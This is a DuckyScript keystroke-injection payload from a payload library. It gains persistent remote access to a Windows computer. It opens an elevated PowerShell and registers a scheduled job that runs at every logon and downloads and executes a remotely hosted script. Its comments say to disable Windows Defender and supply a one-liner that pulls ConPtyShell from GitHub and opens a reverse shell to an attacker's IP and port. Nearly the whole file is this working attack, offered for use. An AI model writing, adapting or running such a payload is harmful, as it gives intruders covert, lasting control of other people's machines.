Path: blob/master/payloads/library/remote_access/Netcat-Reverseshell-On-Log-In/payload.txt
2964 views
REM Title: Netcat Reverseshell On Log In1REM Description: Creates a powershell Job/Task to remotely connect to the computer with netcat every time user logs in2REM Author: https://github.com/HokkaidoInu3REM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer4REM setup:5REM Windows defender is required to be disabled6REM Have IP and port 87 open and listening on server side for netcat reverse shell7REM Create a txt file with the command below in it, replacing the ip to your servers ip:8REM IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 123.456.7.890 879REM Host the text file online on github or your own web server or something10REM Then in the payload, replace https://example.com/txt/load.txt with the url that you are hosting your txt file in raw format11GUI r12DELAY 400013STRING powershell14CTRL SHIFT ENTER15DELAY 400016LEFT17DELAY 400018ENTER19DELAY 400020STRING $T = New-JobTrigger -AtLogOn ; $Script = Invoke-WebRequest 'https://example.com/txt/load.txt' ; $ScriptBlock = [Scriptblock]::Create($Script.Content) ; Register-ScheduledJob -Name "Powershell" -ScriptBlock $ScriptBlock -Trigger $T21DELAY 400022ENTER23DELAY 800024STRING exit25DELAY 400026ENTER272829